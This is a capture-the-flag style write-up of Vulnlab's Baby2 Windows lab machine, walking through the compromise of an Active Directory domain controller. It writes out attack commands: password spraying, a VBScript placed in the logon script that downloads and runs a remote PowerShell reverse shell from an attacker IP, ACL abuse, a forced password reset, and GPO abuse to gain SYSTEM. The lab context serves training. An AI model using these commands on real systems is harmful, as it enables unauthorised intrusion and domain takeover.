Vulnlab’s Baby2 (Medium) Windows Machine – Writeup
Hello Everyone ! This is an writeup of Vulnlab's Baby2 machine. Baby2 is an Medium rated windows machine machine. It is one of the TJNull's OSCP like machines
Summary
Initial access is through finding a valid set of credentials , which has extensive permission to write on a share that hosts a vb script. Replacing the script with a malicious one get's our initial shell as user Amelia.Griffiths
. From there, We could enumerate AD further to find interesting ACLs that the user Amelia.Griffiths
have on gpoadm
user.
Further, gpoadm
user have "GenericAll" rights over 2 GPOs, Using pyGPOAbuse, we can create and execute a scheduled task as SYSTEM user to add gpoadm
to the local administrator group granting us the administrator access.
Enumeration
NMAP Scan
└─➜ sudo rustscan --ulimit 5000 -b 500 -a 10.10.110.149 -- -sC -sV -Pn | tee baby2.nmap [130]
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
Real hackers hack time ⌛
[~] The config file is expected to be at "/root/.rustscan.toml"
[~] Automatically increasing ulimit value to 5000.
Open 10.10.110.149:53
Open 10.10.110.149:88
Open 10.10.110.149:135
Open 10.10.110.149:139
Open 10.10.110.149:389
Open 10.10.110.149:445
Open 10.10.110.149:464
Open 10.10.110.149:593
Open 10.10.110.149:636
Open 10.10.110.149:3268
Open 10.10.110.149:3269
Open 10.10.110.149:3389
Open 10.10.110.149:9389
- Open ports - 53,88,389 are common in Domain Controller.
- Quick nxc scan confirm that, we are indeed dealing with a DC
- We also have anonymous login enabled and shares that have read and write privileges.
Service Enumeration
- Let's dig deeper on the SMB service.
- I'm going to use impacket's smbclient to connect and enumerate the file system
smbclient.py baby2.vl\sdaasda@10.10.110.149
Enumerating apps share
on smbclient
type `shares` to list all the shares
type `use <share_name>` - to select a share
tyep `mget *` - to download all files present
- 2 files - changelog and login.vbs.lnk files are present
- download both files
- CHANGELOG file hints about some automation activity
- Running strings on login.vbs.lnk shows that login.vbs script is most likely fetched from SYSVOL share. But we do not have access to SYSVOL share
Enumerating homes share
- homes share is where we have read and write privileges
It looks like C:/Users folder as it reveals so many usernames
Since there are many folder we can use nxe's spider_plus module to recursively look into the each folders and identify any interesting files
- Apparently there are no files available inside any of the folders
nxc smb 10.10.110.149 -u 'dsad' -p '' --shares -M spider_plus
Enumerating NETLOGON share
- Only 1 file present - login.vbs
- It looks like the automation script that changelog talked about
At this point, Since we have a writable share, Tried scf attack on the homes share and was unsuccessful as there were no interaction received on responder to grab hashes.
Initial Access
- With the usernames we got, let's check if they are valid and any AS-REP roastable users present
kerbrute userenum --dc 10.10.110.146 -d baby2.vl
- All users are valid and no AS-REP roastable users present
- Next step is to check the description of the users, but LDAP anonymous bind is not enabled which stops us from doing few more checks.
- With no hints about passwords, our only option is to try bruteforce with usernames as password.
nxc smb 10.10.101.190 -u usernames -p usernames --no-bruteforce --continue-on-success
--no-bruteforce
flag will bruteforce line 1 to line 1 and don't mix match the provided list&continue-on-sucess
flag will not stop the bruteforce with one valid combination
Excellent ! we got 2 user accounts, with a valid combination
Enumerating Permissions
- Both the user has read & Write access to apps & docs shares. But It's always best to check the access manually on the shares as we cannot rely fully on the tool's output
- Since we have access to apps folder, I tried to replace login.vbs.lnk with a malicious lnk file so that we can get our required interaction on responder to capture the NET-NTLMv2 hash.
- But no luck there, It allows us to upload new files but unable to replace a existing file
- No interesting files under
docs
directory as well - We are left with SYSVOL, Upon enumeration it has the login.vbs file which is present on the .lnk file as previously mentioned, surprisingly we are allowed to put/replace files in that share
- Now the initial access starting to takes shape, Since we have a vb script present, we can put vbs reverse shell inside the script to get our initial shell
- I have added a vbs wscript shell execution code into login.vbs to execute my ConPty reverse shell
Set shell_object = CreateObject("WScript.Shell")
shell_object.Exec ("powershell.exe IEX(IWR http://10.8.2.13:8000/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell 10.8.2.13 4444")
- Let's upload it into SYSVOL and wait for the callback
- Finally, we got our reverse shell as user Amelia.Griffiths
AD Enumeration
- As usual, the first step is to check the privileges
whoami /priv
and we don't see any privileges that we can abuse to escalate our privileges
- Using Powerview , Let's start enumerating the AD.
- Whenever I'm on an AD network, Below are the few things that I do no matter what, to get an overview about the field I'm in. Most of the time, these would give the quick wins or help us to understand the next possible steps
- Enumerate Users
- Enumerate Users description
- Enumerate Computers
- Enumerate Domain shares
- Enumerate Groups
- Enumerate Non-Default group's members
- Enumerate Domain Admin group members
- Enumerate Interesting ACLs
- Enumerate Kerberostable users
- Enumerate AS-REP roastable users
- Enumerate LAPS Delegated groups
- Enumerate Unconstrained delegation
- Enumerate Users & Computers with Constrained delegation
Enumerating Interesting ACLs
Invoke-AClScanner -ResolveGUID
- Looks like gpoadm object has "GenericAll" access to group policies (snipped in screenshot)
- Also the legacy object has WriteDACL, WriteOwner access on gpoadm and gpo-management object
- Also we are part of legacy group, with that we can takeover gpoadm user and then can abuse GenericAll access on group policies to escalate our privileges
Privilege Escalation
Takeover gpoadm
- First step is to add GenericAll rights on gpoadm.
Add-DomainObjectAcl -TargetIdentity "gpoadm" -PrincipalIdentity "legacy" -Domain baby2.vl -Rights All -Verbose
- With the "GenericAll" rights, we can force change the password of gpoadm user
net user gpoadm Password1! /domain
- We have successfully changed the password
BloodHound Enumeration
- We already know that the gpoadm user has GenericAll rights over group policy objects. We'll also use bloodhound to look into it.
- Spin up Bloodhound CE
curl -L https://ghst.ly/getbhce | sudo docker-compose -f - up
- Download the latest release of bloodhound.py which is compatible with the CE Edition
bloodhound-python -d 'baby2.vl' -u 'gpoadm' -p 'Password1!' -c all -ns 10.10.101.190
- Upload the results to bloodhound. we could see the same results visually that
gpoadm
user hasGeneric All
access over 2 group policy objects
Abusing GPO
- As per recommendation by BloodHound CE , We'll use pyGPOAbuse.py. GPO-ID can be obtained from the bloodHound itself by selecting respective object
python3 pygpoabuse.py baby2.vl/gpoadm:'Password1!' -gpo-id '6AC1786C-XXXXXXXXXXX-00C04FB984F9' -command 'net localgroup administrators gpoadm /add' -f -dc-ip 10.10.101.190
- Give few minutes for the scheduled task to run.
- We have successfully added gpoadm user to Administrators group
- Login using impacket's psexec
psexec.py gpoadm:'Password1!'@10.10.119.236
We are now logged in as nt authority\system. I hope you enjoyed this writeup. For any questions/suggestions, Please feel free to connect with me on LinkedIn.